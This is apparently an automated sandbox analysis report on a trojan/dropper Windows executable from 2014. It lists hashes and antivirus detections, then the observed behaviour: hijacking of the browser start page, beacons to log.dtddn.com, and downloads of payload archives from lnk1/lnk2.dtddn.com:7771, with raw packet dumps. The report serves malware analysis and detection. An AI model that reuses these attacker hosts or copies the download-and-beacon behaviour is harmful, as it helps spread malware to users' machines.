Analysis Date2014-11-07 12:35:01
MD50367314cc6f15aa6520b3db91b21c537
SHA12f2ad423acb9ec9303226b36623aeffe72032490

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0839d8e29d28fba7fdf3628bd1e67a83 sha1: 4824a2c9a775648037cdffc4ee8f138e9772d00c size: 159744
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 9d8c7d7365c64516ae295a19e6c69f80 sha1: 9a33ff0f5850de70c94df9f5e8e9371160110e54 size: 8192
Timestamp2014-10-09 01:01:57
VersionInternalName: svlkwwoafhnlsi
FileVersion: 1.00
CompanyName: Ggz4s1WMA
ProductName: svlkwwoafhnlsi
ProductVersion: 1.00
OriginalFilename: svlkwwoafhnlsi.exe
PackerMicrosoft Visual Basic v5.0
PEhashb5df6a116eaff459482a879263e66932e8bb58b2
IMPhash8d23701856e33f4025cbdf3482cc9ac8
AV360 SafeGen:Trojan.Heur.ZGY.6
AVAd-AwareGen:Trojan.Heur.ZGY.6
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.OFRE-0045
AVAvira (antivir)TR/Dropper.Gen
AVBullGuardGen:Trojan.Heur.ZGY.6
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Trojan.Heur.ZGY.6
AVEset (nod32)Win32/Paskod.A
AVFortinetW32/Dynamer.PSZ!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Trojan.Heur.ZGY.6
AVGrisoft (avg)Win32/VBCrypt
AVIkarusTrojan.VBCrypt
AVK7Trojan ( 0049f5391 )
AVKasperskyTrojan.Win32.Dynamer.psz
AVMalwareBytesno_virus
AVMcafeeObfuscated-FBW!0367314CC6F1
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.ZGY.6
AVNormanGen:Trojan.Heur.ZGY.6
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend MicroTROJ_VB.SMIS
AVVirusBlokAda (vba32)BScope.Trojan.Diple

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\m0q\Edit ➝
3102\\x00
RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\w2m\copin ➝
136638818804\\x00
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\vhkiik.ini
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\vhkiik.ini
Creates ProcessC:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\vhkiik.ini"
Creates MutexScanPK23102
Creates Mutexup3102
Winsock DNSdown.dtddn.com
Winsock DNSlog.dtddn.com
Winsock DNSdown.sz-guogeng.com
Winsock DNSdldir1.qq.com
Winsock DNSlnk1.dtddn.com
Winsock DNSlnk2.dtddn.com

Process
↳ C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\vhkiik.ini"

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00

Network Details:

DNSlog.dtddn.com
Type: A
112.124.183.10
DNSlog.dtddn.com
Type: A
112.124.183.10
DNSlnk1.dtddn.com
Type: A
121.40.172.60
DNSlnk2.dtddn.com
Type: A
121.40.172.60
DNSlnk1.dtddn.com
Type: A
121.40.172.60
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.93
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.217
DNSdown.dtddn.com
Type: A
112.124.120.200
DNSdown.sz-guogeng.com
Type: A
112.124.120.200
DNSdldir1.qq.com
Type: A
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=136638818804%2073718
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=136638818804%2077093
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=136638818804%2080171
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/1.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/2.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/3.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/4.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/6.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/7.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/8.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/9.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20Q2-Beg1&Info1=136638818804%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.dtddn.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.sz-guogeng.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20Q2-DownI&Info1=136638818804%201%200%201
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/1.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/2.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/3.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/4.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/5.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/6.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/7.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/8.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/9.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=136638818804%20116609
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=136638818804%20119703
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=136638818804%20122781
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Flows TCP192.168.1.1:1031 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1032 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1033 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1034 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1035 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1036 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1037 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1038 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1039 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1040 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1041 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1042 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1043 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1044 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1045 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1046 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1047 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1048 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1049 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1050 ➝ 174.35.56.93:80
Flows TCP192.168.1.1:1051 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1052 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1053 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1054 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1055 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1056 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1057 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1058 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1059 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1060 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1061 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1062 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1063 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1064 ➝ 112.124.183.10:80

Raw Pcap
0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303733 37313820 48545450 2f312e31   2073718 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303737 30393320 48545450 2f312e31   2077093 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303830 31373120 48545450 2f312e31   2080171 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f312e72 61722048   GET /lnk/1.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f322e72 61722048   GET /lnk/2.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f332e72 61722048   GET /lnk/3.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f342e72 61722048   GET /lnk/4.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f362e72 61722048   GET /lnk/6.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f372e72 61722048   GET /lnk/7.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f382e72 61722048   GET /lnk/8.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f392e72 61722048   GET /lnk/9.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 3051322d 42656731 26496e66   02%20Q2-Beg1&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303125 32303020 48545450 2f312e31   201%200 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
